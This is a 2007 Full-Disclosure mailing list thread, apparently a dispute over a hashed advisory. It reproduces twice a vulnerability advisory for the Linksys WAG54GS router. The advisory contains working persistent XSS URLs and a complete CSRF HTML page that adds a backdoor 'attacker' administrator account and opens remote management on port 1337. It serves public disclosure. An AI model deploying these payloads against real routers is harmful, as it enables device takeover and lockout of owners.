We heard you the first time, gobbles aka n3td3v. - doc neal http://www.hackerfactor.com/blog/
On Wed, Jun 27, 2007 at 10:49:25PM +0100, pagvac wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Nice look up to http://unknown.pentester.googlepages.com/sitemap.xml > > If you bothered that much you deserve the advisory I guess :-D. > > btw, I didn't know google pages have sitemap.xml enabled by default. > > So no hash cracking here, just to set things straight. > > Joey Mengele wrote: > > After plugging this hash into John The Ripper, I was able to > > reproduce the text of the original advisory. It follows in > > entirety. For those wishing to verify the hash provided by the > > architect, I have also included the advisory in attachment form as > > a convenience for the skeptics who say MD5 can not be reversed. > > > > J > > > > ___ BEGIN LAME CRACKED ADVISORY ___ > > Persistent XSS and CSRF and on Wireless-G ADSL Gateway with > > SpeedBooster (WAG54GS) > > > > == Date found == > > > > 24 June 2007 > > > > == Firmware Version == > > > > V1.00.06 > > > > == Description == > > > > > > There are several persistent XSS vulnerabilities on the > > '/setup.cgi' script. > > > > It is possible to inject JavaScript by assigning a payload like the > > following > > to any of the vulnerable parameters: > > > >> <script>[PAYLOAD]</script> > > > > The vulnerable (non-sanitized) parameters are the following: > > > > 'devname' > > 'snmp_getcomm' > > 'snmp_setcomm' > > 'c4_trap_ip_' > > > > Additionally, all HTTP requests are not tokenized using non- > > predictable values. > > Thus, all requests to the router's HTTP interface are vulnerable to > > Cross-site > > Request Forgeries (CSRF), perhaps by design. > > > > The following is an example of a HTTP request (notice the lack of > > non-predictable tokens): > > > > POST /setup.cgi HTTP/1.1 > > Authorization: Basic YWRtaW46YWRtaW4= > > > > mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file > > =Factorydefaults.htm&next_file=index.htm&message= > > > > Although the original request is a POST, we can convert it to a > > GET, so that all posted parameters can be submitted on a single URL. > > > > For example, the previous POST request can be converted to a URL > > such as the following: > > > > http://admin:[EMAIL PROTECTED]/setup.cgi?mtenRestore=Restore+Factor > > y+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_f > > ile=index.htm&message= > > > > By forging administrative requests ("Administration" button on the > > router's HTML menu), an attacker can compromise the router provided > > the > > victim user visits a malicious URL or HTML page. > > > > The attack can only be successfuly if any of the following > > conditions are met: > > > > - the administrator hasn't changed the default credentials > > (admin/admin) > > - the administrator's browser has an active authentication session > > with the router's interface when the attack happens > > (highly unlikely) > > > > > > == Persistent XSS PoC == > > > > The following URL creates a DoS condition by making the > > "Administration" page inaccessible since 'history.back()' > > will run everytime the Administration page is visited. Thus the > > administrator won't be able to ever change the > > default credentials unless a hard reset is performed on using the > > router's physical "restart" switch: > > > > http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=1&sysname=admin& > > sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http > > _wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_e > > nable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged= > > yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()< > > /script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=ena > > ble&todo=save&this_file=Administration.htm&next_file=Administration. > > htm&message= > > http://tinyurl.com/36sjzw > > > > > > == CSRF PoC == > > > > The following HTML page does the following: > > > > - adds an *additional* administrative account, with a username > > equals to 'attacker' and a password equals to '0wned' (without > > removing original admin account!) > > - enables remote HTTP management over port 1337 > > - sets other settings that are inrelevant to this discussion > > > > <html> > > <body> > > <script> > > // send 2 requests to add an administrative account and enable > > remote management > > // tries with default credentials and with credentials cached by > > browser (if any) > > > > var img = new Image(); > > var img2 = new Image(); > > > > img.src = > > 'http://admin:[EMAIL PROTECTED]/setup.cgi?user_list=8&sysname=attack > > er&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&h > > ttp_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wla > > n_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchang > > ed=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable > > &h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Admin > > istration.htm&next_file=Administration.htm&message='; > > img2.src = > > 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd > > =0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport= > > 1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=ena > > ble&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_rem > > ote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enab > > le=enable&h_wlan_enable=enable&todo=save&this_file=Administration.ht > > m&next_file=Administration.htm&message='; > > </script> > > </body> > > </html> > > > > The first URL forges the administrative request using the default > > credentials, so it won't work if default credentials > > have been changed. > > > > The second URL doesn't specify any credentials as an attempt to use > > the browser's cached credentials. > > If the admin user has clicked on "Save password" on the basic > > authentication prompt, most browsers will > > prompt the user to confirm submitting the cached credentials. The > > only situation in which browsers won't > > ask the user to confirm submitting the credentials would be if the > > malicious CSRF page was visited while > > the browser has an active authenticated session with the router's > > HTTP interface (very unlikely). > > > > > > == Additional notes == > > > > - router reboots after saving settings (requests sent to > > 'setup.cgi') > > > > - all attacks were tested using Internet Explorer 7 > > > > - No firmware updates were available at time of testing, only GPL > > code is available: > > > > http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagen > > ame=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisito > > rWrapper&lid=8904040638B02&displaypage=download#versiondetail > > > > > > == References == > > > > http://www.linksys.com/ > > > > > > == Credits == > > > > pagvac [ikwt.com] and Petko Petkov [gnucitizen.org] > > ___ END LAME CRACKED ADVISORY ___ > > > > On Wed, 27 Jun 2007 16:29:43 -0400 pagvac > > <[EMAIL PROTECTED]> wrote: > >> The file "research.txt" will be provided once the vendor fixes the > >> issues. At that point anyone can check that the hash matches the > >> one > >> included in this post. > >> > >> Thank you. > >> > >> Joey Mengele wrote: > >>> Please provide the original content of research.txt so I can > >> verify > >>> that the hash is correct. I will also need the hash of your > >>> md5sum.exe. Thanks. > >>> > >>> J > >>> > >>> On Wed, 27 Jun 2007 16:02:16 -0400 pagvac > >>> <[EMAIL PROTECTED]> wrote: > >>>> The HTTP interface of a network appliance has been researched > >> and > >>>> found to be vulnerable to several persistent XSS and CSRF. > >>>> > >>>> Such research was done by pdp (architect) and myself. We > >> informed > >>>> the > >>>> vendor and will publish the details when a fix is available. > >>>> > >>>> The following is the MD5 hash for the advisory file. > >>>> > >>>> $ md5sum.exe research.txt > >>>> 3db1d71fc3a0eae119617b3b1124206f *research.txt > >>>> > >>>> Regards, > >>>> > >>>> -- > >>>> pagvac > >>>> [http://gnucitizen.org, http://ikwt.com/] > >>> -- > >>> Click here for to find products that will help grow your small > >> business. > >> http://tagline.hushmail.com/fc/Ioyw6h4eDJc9UN71zvlsGp4ZGBzvqUZDr59L > >> zooSm6N56gZuYA97Kt/ > >>> > >> > >> -- > >> pagvac > >> [http://gnucitizen.org, http://ikwt.com/] > > > > -- > > Click to make millions by owning your own franchise > > http://tagline.hushmail.com/fc/Ioyw6h4eB8rDoXd3rzWGRyuLVrO8wOmiWFoFiDB4VYIwImlRd0K9S9/ > > > > ---------------------------------------------------------------------- > > > > Persistent XSS and CSRF and on Wireless-G ADSL Gateway with > SpeedBooster (WAG54GS) > > > > == Date found == > > > > 24 June 2007 > > > > == Firmware Version == > > > > V1.00.06 > > > > == Description == > > > > > > There are several persistent XSS vulnerabilities on the '/setup.cgi' > script. > > > > It is possible to inject JavaScript by assigning a payload like the > following > > to any of the vulnerable parameters: > > > >> <script>[PAYLOAD]</script> > > > > The vulnerable (non-sanitized) parameters are the following: > > > > 'devname' > > 'snmp_getcomm' > > 'snmp_setcomm' > > 'c4_trap_ip_' > > > > Additionally, all HTTP requests are not tokenized using non-predictable > values. > > Thus, all requests to the router's HTTP interface are vulnerable to > Cross-site > > Request Forgeries (CSRF), perhaps by design. > > > > The following is an example of a HTTP request (notice the lack of > non-predictable tokens): > > > > POST /setup.cgi HTTP/1.1 > > Authorization: Basic YWRtaW46YWRtaW4= > > > > > mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message= > > > > Although the original request is a POST, we can convert it to a GET, so > that all posted parameters can be submitted on a single URL. > > > > For example, the previous POST request can be converted to a URL such > as the following: > > > > > http://admin:[EMAIL > PROTECTED]/setup.cgi?mtenRestore=Restore+Factory+Defaults&todo=defaultsettings&this_file=Factorydefaults.htm&next_file=index.htm&message= > > > > By forging administrative requests ("Administration" button on the > router's HTML menu), an attacker can compromise the router provided the > > victim user visits a malicious URL or HTML page. > > > > The attack can only be successfuly if any of the following conditions > are met: > > > > - the administrator hasn't changed the default credentials (admin/admin) > > - the administrator's browser has an active authentication session with > the router's interface when the attack happens > > (highly unlikely) > > > > > > == Persistent XSS PoC == > > > > The following URL creates a DoS condition by making the > "Administration" page inaccessible since 'history.back()' > > will run everytime the Administration page is visited. Thus the > administrator won't be able to ever change the > > default credentials unless a hard reset is performed on using the > router's physical "restart" switch: > > > > > http://admin:[EMAIL > PROTECTED]/setup.cgi?user_list=1&sysname=admin&sysPasswd=admin&sysConfirmPasswd=admin&remote_management=enable&http_wanport=8080&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=1&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_="><script>history.back()</script>&h_snmp_enable=enable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message= > > http://tinyurl.com/36sjzw > > > > > > == CSRF PoC == > > > > The following HTML page does the following: > > > > - adds an *additional* administrative account, with a username equals > to 'attacker' and a password equals to '0wned' (without removing > original admin account!) > > - enables remote HTTP management over port 1337 > > - sets other settings that are inrelevant to this discussion > > > > <html> > > <body> > > <script> > > // send 2 requests to add an administrative account and enable > remote management > > // tries with default credentials and with credentials cached > by browser (if any) > > > > var img = new Image(); > > var img2 = new Image(); > > > > img.src = > 'http://admin:[EMAIL > PROTECTED]/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message='; > > img2.src = > 'http://192.168.1.1/setup.cgi?user_list=8&sysname=attacker&sysPasswd=0wned&sysConfirmPasswd=0wned&remote_management=enable&http_wanport=1337&devname=&snmp_enable=disable&upnp_enable=enable&wlan_enable=enable&save=Save+Settings&h_user_list=8&h_pwset=yes&pwchanged=yes&h_remote_management=enable&c4_trap_ip_=&h_snmp_enable=disable&h_upnp_enable=enable&h_wlan_enable=enable&todo=save&this_file=Administration.htm&next_file=Administration.htm&message='; > > </script> > > </body> > > </html> > > > > The first URL forges the administrative request using the default > credentials, so it won't work if default credentials > > have been changed. > > > > The second URL doesn't specify any credentials as an attempt to use the > browser's cached credentials. > > If the admin user has clicked on "Save password" on the basic > authentication prompt, most browsers will > > prompt the user to confirm submitting the cached credentials. The only > situation in which browsers won't > > ask the user to confirm submitting the credentials would be if the > malicious CSRF page was visited while > > the browser has an active authenticated session with the router's HTTP > interface (very unlikely). > > > > > > == Additional notes == > > > > - router reboots after saving settings (requests sent to 'setup.cgi') > > > > - all attacks were tested using Internet Explorer 7 > > > > - No firmware updates were available at time of testing, only GPL code > is available: > > > > http://www.linksys.com/servlet/Satellite?c=L_CASupport_C2&childpagename=US%2FLayout&cid=1166859889040&pagename=Linksys%2FCommon%2FVisitorWrapper&lid=8904040638B02&displaypage=download#versiondetail > > > > > > == References == > > > > http://www.linksys.com/ > > > > > > == Credits == > > > > pagvac [ikwt.com] and Petko Petkov [gnucitizen.org] > > > - -- > pagvac > [http://gnucitizen.org, http://ikwt.com/] > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.2.2 (MingW32) > > iD8DBQFGgttjjXB4hX6OC/cRAjPBAKCHfyKTxufqkA3umJivYkePZr2IxQCfaIPd > /NTsZfC0sSYvWezySDRmtZY= > =2L6c > -----END PGP SIGNATURE----- > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
